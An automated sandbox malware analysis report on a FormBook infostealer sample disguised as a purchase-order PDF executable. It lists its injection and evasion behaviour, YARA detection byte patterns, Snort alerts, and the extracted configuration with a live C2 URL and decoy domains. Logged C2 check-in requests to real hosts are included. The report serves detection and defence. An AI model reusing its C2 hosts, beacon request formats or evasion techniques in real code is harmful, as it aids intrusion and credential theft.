Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO-230821_pdf.exe

Overview

General Information

Sample Name:PO-230821_pdf.exe
Analysis ID:1295108
MD5:ac43233dd5fe6d55c112660dc700e564
SHA1:2f431f411c707593f2f4bd67da5db2e9a9593778
SHA256:d93182b7b2c8633aa7f379efdc80aa778ecc0b59a01929bb10a02cd8349354d2
Tags:exeformbook
Infos:

Detection

FormBook, NSISDropper
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected NSISDropper
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Modifies the prolog of user mode functions (user mode inline hooks)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Found decision node followed by non-executed suspicious APIs
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • PO-230821_pdf.exe (PID: 7080 cmdline: C:\Users\user\Desktop\PO-230821_pdf.exe MD5: AC43233DD5FE6D55C112660DC700E564)
    • PO-230821_pdf.exe (PID: 7148 cmdline: C:\Users\user\Desktop\PO-230821_pdf.exe MD5: AC43233DD5FE6D55C112660DC700E564)
      • explorer.exe (PID: 4376 cmdline: C:\Windows\Explorer.EXE MD5: EEC7F02FBAE12687726D441FFADC051D)
        • autofmt.exe (PID: 6204 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: A5202257A05BB4D3773A2717317C2D95)
        • control.exe (PID: 6216 cmdline: C:\Windows\SysWOW64\control.exe MD5: 4DBD69D4C9DA5AAAC731F518EF8EBEA0)
          • cmd.exe (PID: 6268 cmdline: /c del "C:\Users\user\Desktop\PO-230821_pdf.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: CE1A079265E7A92863BAAD92DE538D72)
  • cleanup
{"C2 list": ["www.zachmahl.com/sn26/"], "decoy": ["resenha10.bet", "gulshan-rajput.com", "xbus.tech", "z813my.cfd", "wlxzjlny.cfd", "auntengotiempo.com", "canada-reservation.com", "thegiftcompany.shop", "esthersilveirapropiedades.com", "1wapws.top", "ymjblnvo.cfd", "termokimik.net", "kushiro-artist-school.com", "bmmboo.com", "caceresconstructionservices.com", "kentuckywalkabout.com", "bringyourcart.com", "miamiwinetour.com", "bobcatsocial.site", "thirdmind.network", "4tbbwa.com", "rhinosecurellc.net", "rdparadise.com", "radpm.xyz", "thewhiteorchidspa.com", "clhynfco.cfd", "ngohcvja.cfd", "woodennickelcandles.com", "gg18rb.cfd", "qcdrxwr.cfd", "974dp.com", "lagardere-vivendi-corp.net", "chestnutmaretraining.com", "seosjekk.online", "ahevrlh.xyz", "uedam.xyz", "natrada.love", "yoywvfw.top", "unifiedtradingjapan.com", "chinakaldi.com", "agenciacolmeiadigital.com", "wdlzzfkc.cfd", "097850.com", "xingcansy.com", "uahrbqtj.cfd", "charliehaywood.com", "witheres.shop", "sqiyvdrx.cfd", "biopfizer.com", "tiktokviewer.com", "prftwgmw.cfd", "sfsdnwpf.cfd", "linkboladewahub.xyz", "orvados.com", "goodshepherdopcesva.com", "christianlovewv.com", "cdicontrols.com", "hawskio26.click", "ownlegalhelp.com", "tiydmdzp.cfd", "ppirr.biz", "stonyatrick.com", "itsamazingbarley.com", "msjbaddf.cfd"]}
SourceRuleDescriptionAuthorStrings
00000005.00000002.3555201775.0000000000B00000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.3555201775.0000000000B00000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000002.3555201775.0000000000B00000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000005.00000002.3555201775.0000000000B00000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000005.00000002.3555201775.0000000000B00000.00000040.80000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18839:$sqlite3step: 68 34 1C 7B E1
      • 0x1894c:$sqlite3step: 68 34 1C 7B E1
      • 0x18868:$sqlite3text: 68 38 2A 90 C5
      • 0x1898d:$sqlite3text: 68 38 2A 90 C5
      • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 35 entries
      SourceRuleDescriptionAuthorStrings
      0.2.PO-230821_pdf.exe.2470000.1.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0.2.PO-230821_pdf.exe.2470000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          0.2.PO-230821_pdf.exe.2470000.1.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bdb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          0.2.PO-230821_pdf.exe.2470000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          0.2.PO-230821_pdf.exe.2470000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17a39:$sqlite3step: 68 34 1C 7B E1
          • 0x17b4c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a68:$sqlite3text: 68 38 2A 90 C5
          • 0x17b8d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 15 entries
          No Sigma rule has matched
          Timestamp:192.168.2.934.102.136.18049713802031412 08/22/23-13:43:19.690083
          SID:2031412
          Source Port:49713
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.91.1.1.149710802031412 08/22/23-13:42:15.993943
          SID:2031412
          Source Port:49710
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.935.233.138.13249712802031412 08/22/23-13:42:58.501536
          SID:2031412
          Source Port:49712
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.9217.70.184.5049715802031412 08/22/23-13:44:02.774000
          SID:2031412
          Source Port:49715
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.966.96.162.12949711802031412 08/22/23-13:42:37.152483
          SID:2031412
          Source Port:49711
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.9188.114.97.749714802031412 08/22/23-13:43:41.839079
          SID:2031412
          Source Port:49714
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.934.149.87.4549716802031412 08/22/23-13:44:28.778609
          SID:2031412
          Source Port:49716
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.9107.148.25.12249733802031412 08/22/23-13:45:13.541361
          SID:2031412
          Source Port:49733
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 00000005.00000002.3555201775.0000000000B00000.00000040.80000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.zachmahl.com/sn26/"], "decoy": ["resenha10.bet", "gulshan-rajput.com", "xbus.tech", "z813my.cfd", "wlxzjlny.cfd", "auntengotiempo.com", "canada-reservation.com", "thegiftcompany.shop", "esthersilveirapropiedades.com", "1wapws.top", "ymjblnvo.cfd", "termokimik.net", "kushiro-artist-school.com", "bmmboo.com", "caceresconstructionservices.com", "kentuckywalkabout.com", "bringyourcart.com", "miamiwinetour.com", "bobcatsocial.site", "thirdmind.network", "4tbbwa.com", "rhinosecurellc.net", "rdparadise.com", "radpm.xyz", "thewhiteorchidspa.com", "clhynfco.cfd", "ngohcvja.cfd", "woodennickelcandles.com", "gg18rb.cfd", "qcdrxwr.cfd", "974dp.com", "lagardere-vivendi-corp.net", "chestnutmaretraining.com", "seosjekk.online", "ahevrlh.xyz", "uedam.xyz", "natrada.love", "yoywvfw.top", "unifiedtradingjapan.com", "chinakaldi.com", "agenciacolmeiadigital.com", "wdlzzfkc.cfd", "097850.com", "xingcansy.com", "uahrbqtj.cfd", "charliehaywood.com", "witheres.shop", "sqiyvdrx.cfd", "biopfizer.com", "tiktokviewer.com", "prftwgmw.cfd", "sfsdnwpf.cfd", "linkboladewahub.xyz", "orvados.com", "goodshepherdopcesva.com", "christianlovewv.com", "cdicontrols.com", "hawskio26.click", "ownlegalhelp.com", "tiydmdzp.cfd", "ppirr.biz", "stonyatrick.com", "itsamazingbarley.com", "msjbaddf.cfd"]}
          Source: PO-230821_pdf.exeReversingLabs: Detection: 68%
          Source: PO-230821_pdf.exeVirustotal: Detection: 42%Perma Link
          Source: Yara matchFile source: 0.2.PO-230821_pdf.exe.2470000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PO-230821_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PO-230821_pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO-230821_pdf.exe.2470000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.3555201775.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.3579059104.00000000047A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1089258487.0000000002470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1177156109.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1174806021.0000000000990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.3575195181.0000000003030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: http://www.ymjblnvo.cfd/sn26/lJAvira URL Cloud: Label: malware
          Source: http://www.kentuckywalkabout.com/sn26/www.qcdrxwr.cfdAvira URL Cloud: Label: malware
          Source: http://www.uahrbqtj.cfd/sn26/?kJBLpb8=ueTspPcvStQ4P/B/BGMviMSUI7+26iAWBkDAplOqW0XstMbPZQlOryCbf8ldO6To/Dtn&ML0tl=NZlpiAvira URL Cloud: Label: malware
          Source: http://www.zachmahl.com/sn26/www.uahrbqtj.cfdAvira URL Cloud: Label: malware
          Source: http://www.4tbbwa.com/sn26/Avira URL Cloud: Label: malware
          Source: http://www.974dp.com/sn26/Avira URL Cloud: Label: malware
          Source: www.zachmahl.com/sn26/Avira URL Cloud: Label: malware
          Source: http://www.thewhiteorchidspa.com/sn26/Avira URL Cloud: Label: malware
          Source: http://www.bmmboo.com/sn26/Avira URL Cloud: Label: malware
          Source: http://www.uedam.xyz/sn26/Avira URL Cloud: Label: phishing
          Source: http://www.ahevrlh.xyz/sn26/?kJBLpb8=K4V3qd++KPCvHN0rtQuWoGyJj5p2Mca2XR5lWleZSjXEQHmkvvLfGF2tUiVxqdSsVX/P&ML0tl=NZlpiAvira URL Cloud: Label: phishing
          Source: http://www.974dp.comAvira URL Cloud: Label: malware
          Source: http://www.kentuckywalkabout.comAvira URL Cloud: Label: phishing
          Source: http://www.974dp.com/sn26/www.bmmboo.comAvira URL Cloud: Label: malware
          Source: http://www.ownlegalhelp.com/sn26/Avira URL Cloud: Label: malware
          Source: http://www.thewhiteorchidspa.com/sn26/www.zachmahl.comAvira URL Cloud: Label: malware
          Source: http://www.canada-reservation.comAvira URL Cloud: Label: phishing
          Source: http://www.qcdrxwr.cfd/sn26/www.uedam.xyzAvira URL Cloud: Label: phishing
          Source: http://www.thirdmind.network/sn26/www.thewhiteorchidspa.comAvira URL Cloud: Label: malware
          Source: http://www.bmmboo.com/sn26/www.ownlegalhelp.comAvira URL Cloud: Label: malware
          Source: http://www.uahrbqtj.cfdAvira URL Cloud: Label: malware
          Source: http://www.ymjblnvo.cfd/sn26/Avira URL Cloud: Label: malware
          Source: http://www.bmmboo.comAvira URL Cloud: Label: malware
          Source: http://www.wdlzzfkc.cfd/sn26/www.canada-reservation.comAvira URL Cloud: Label: malware
          Source: http://www.thirdmind.network/sn26/?kJBLpb8=JTmN6zoWWGNjq6ib/pFFv2cag4i5j1OLo1K7cxhy0Qg9CF/c4lTnOzzR4r51HW/WUnmz&ML0tl=NZlpiAvira URL Cloud: Label: malware
          Source: http://www.zachmahl.com/sn26/Avira URL Cloud: Label: malware
          Source: http://www.ownlegalhelp.comAvira URL Cloud: Label: malware
          Source: http://www.thirdmind.network/sn26/Avira URL Cloud: Label: malware
          Source: http://www.thewhiteorchidspa.comAvira URL Cloud: Label: malware
          Source: http://www.uahrbqtj.cfd/sn26/Avira URL Cloud: Label: malware
          Source: http://www.ymjblnvo.cfdAvira URL Cloud: Label: malware
          Source: http://www.thirdmind.networkAvira URL Cloud: Label: malware
          Source: http://www.4tbbwa.com/sn26/?kJBLpb8=CpYCJqaIXUbm3IVdfGXcfWVbwpqiZyf/2rRsJh0RGmHsf115fz67BvVx/+oGOa6+KG1D&ML0tl=NZlpiAvira URL Cloud: Label: malware
          Source: http://www.uedam.xyzAvira URL Cloud: Label: malware
          Source: http://www.ahevrlh.xyz/sn26/www.thirdmind.networkAvira URL Cloud: Label: phishing
          Source: http://www.ownlegalhelp.com/sn26/www.4tbbwa.comAvira URL Cloud: Label: malware
          Source: http://www.4tbbwa.com/sn26/www.ahevrlh.xyzAvira URL Cloud: Label: malware
          Source: http://www.4tbbwa.comAvira URL Cloud: Label: malware
          Source: http://www.qcdrxwr.cfd/sn26/Avira URL Cloud: Label: phishing
          Source: http://www.qcdrxwr.cfdAvira URL Cloud: Label: phishing
          Source: http://www.uahrbqtj.cfd/sn26/www.wdlzzfkc.cfdAvira URL Cloud: Label: malware
          Source: http://www.canada-reservation.com/sn26/www.kentuckywalkabout.comAvira URL Cloud: Label: malware
          Source: http://www.ownlegalhelp.com/sn26/?kJBLpb8=ad9cmfoqC6MwmQXB3DEhd3FKpHJj9M1rumkw8RT4btYHOQ1rLKeZlf6UtJZu69H1aK6T&ML0tl=NZlpiAvira URL Cloud: Label: malware
          Source: http://www.wdlzzfkc.cfd/sn26/Avira URL Cloud: Label: malware
          Source: http://www.1wapws.top/sn26/www.ymjblnvo.cfdAvira URL Cloud: Label: phishing
          Source: http://www.canada-reservation.com/sn26/Avira URL Cloud: Label: malware
          Source: http://www.bmmboo.com/sn26/?kJBLpb8=EN17TsAzaZG5OYgbKAyh3RhQlZ+M+bHTnDIlweAI/VTqrT2/7Z1rXkvFwetHy2WBWOd9&ML0tl=NZlpiAvira URL Cloud: Label: malware
          Source: http://www.ahevrlh.xyz/sn26/Avira URL Cloud: Label: phishing
          Source: http://www.kentuckywalkabout.com/sn26/Avira URL Cloud: Label: malware
          Source: http://www.uedam.xyz/sn26/www.1wapws.topAvira URL Cloud: Label: phishing
          Source: http://www.974dp.com/sn26/?kJBLpb8=qaEGeuQorcUQurUZCuE8d9pas+Z0M0brqtX248JBolEfq8j8F1R9i1jKZexhxY54UlRG&ML0tl=NZlpiAvira URL Cloud: Label: malware
          Source: http://www.1wapws.topAvira URL Cloud: Label: malware
          Source: http://www.1wapws.top/sn26/Avira URL Cloud: Label: phishing
          Source: C:\Users\user\AppData\Local\Temp\nsv6B4F.tmp\hutskogno.dllReversingLabs: Detection: 66%
          Source: PO-230821_pdf.exeJoe Sandbox ML: detected
          Source: PO-230821_pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: PO-230821_pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: wntdll.pdbUGP source: PO-230821_pdf.exe, 00000000.00000003.1071081018.00000000033E0000.00000004.00001000.00020000.00000000.sdmp, PO-230821_pdf.exe, 00000000.00000003.1061552946.0000000003210000.00000004.00001000.00020000.00000000.sdmp, PO-230821_pdf.exe, 00000002.00000002.1175067955.0000000000B1D000.00000040.00001000.00020000.00000000.sdmp, PO-230821_pdf.exe, 00000002.00000003.1085830988.0000000000843000.00000004.00000020.00020000.00000000.sdmp, PO-230821_pdf.exe, 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, PO-230821_pdf.exe, 00000002.00000003.1079126719.000000000069F000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.3580763090.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000002.3580763090.0000000004B1D000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000003.1174837585.00000000046A0000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000003.1181131787.000000000484A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdb source: PO-230821_pdf.exe, 00000002.00000002.1177684614.00000000027B0000.00000040.10000000.00040000.00000000.sdmp, PO-230821_pdf.exe, 00000002.00000002.1174512830.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.3558576622.0000000000D10000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: PO-230821_pdf.exe, PO-230821_pdf.exe, 00000002.00000002.1175067955.0000000000B1D000.00000040.00001000.00020000.00000000.sdmp, PO-230821_pdf.exe, 00000002.00000003.1085830988.0000000000843000.00000004.00000020.00020000.00000000.sdmp, PO-230821_pdf.exe, 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, PO-230821_pdf.exe, 00000002.00000003.1079126719.000000000069F000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.3580763090.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000002.3580763090.0000000004B1D000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000003.1174837585.00000000046A0000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000003.1181131787.000000000484A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdbUGP source: PO-230821_pdf.exe, 00000002.00000002.1177684614.00000000027B0000.00000040.10000000.00040000.00000000.sdmp, PO-230821_pdf.exe, 00000002.00000002.1174512830.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.3558576622.0000000000D10000.00000040.80000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 4x nop then pop esi2_2_00417317
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 4x nop then pop edi2_2_00417D59
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 4x nop then pop edi2_2_00417DBA

          Networking

          barindex
          Source: C:\Windows\explorer.exeNetwork Connect: 1.1.1.1 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 188.114.97.7 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 35.233.138.132 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 66.96.162.129 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 217.70.184.50 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 34.149.87.45 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 107.148.25.122 80Jump to behavior
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49710 -> 1.1.1.1:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49711 -> 66.96.162.129:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49712 -> 35.233.138.132:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49713 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49714 -> 188.114.97.7:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49715 -> 217.70.184.50:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49716 -> 34.149.87.45:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49733 -> 107.148.25.122:80
          Source: DNS query: www.ahevrlh.xyz
          Source: Malware configuration extractorURLs: www.zachmahl.com/sn26/
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /sn26/?kJBLpb8=qaEGeuQorcUQurUZCuE8d9pas+Z0M0brqtX248JBolEfq8j8F1R9i1jKZexhxY54UlRG&ML0tl=NZlpi HTTP/1.1Host: www.974dp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sn26/?kJBLpb8=EN17TsAzaZG5OYgbKAyh3RhQlZ+M+bHTnDIlweAI/VTqrT2/7Z1rXkvFwetHy2WBWOd9&ML0tl=NZlpi HTTP/1.1Host: www.bmmboo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sn26/?kJBLpb8=ad9cmfoqC6MwmQXB3DEhd3FKpHJj9M1rumkw8RT4btYHOQ1rLKeZlf6UtJZu69H1aK6T&ML0tl=NZlpi HTTP/1.1Host: www.ownlegalhelp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sn26/?kJBLpb8=CpYCJqaIXUbm3IVdfGXcfWVbwpqiZyf/2rRsJh0RGmHsf115fz67BvVx/+oGOa6+KG1D&ML0tl=NZlpi HTTP/1.1Host: www.4tbbwa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sn26/?kJBLpb8=K4V3qd++KPCvHN0rtQuWoGyJj5p2Mca2XR5lWleZSjXEQHmkvvLfGF2tUiVxqdSsVX/P&ML0tl=NZlpi HTTP/1.1Host: www.ahevrlh.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sn26/?kJBLpb8=JTmN6zoWWGNjq6ib/pFFv2cag4i5j1OLo1K7cxhy0Qg9CF/c4lTnOzzR4r51HW/WUnmz&ML0tl=NZlpi HTTP/1.1Host: www.thirdmind.networkConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sn26/?kJBLpb8=pgVZ8pYUx/mb3SHekAxrqKnjfvNT295Kch72LXoG5YoxLYYfuZ6zPfF7UahT16hGXPUe&ML0tl=NZlpi HTTP/1.1Host: www.thewhiteorchidspa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sn26/?kJBLpb8=ueTspPcvStQ4P/B/BGMviMSUI7+26iAWBkDAplOqW0XstMbPZQlOryCbf8ldO6To/Dtn&ML0tl=NZlpi HTTP/1.1Host: www.uahrbqtj.cfdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 188.114.97.7 188.114.97.7
          Source: Joe Sandbox ViewIP Address: 188.114.97.7 188.114.97.7
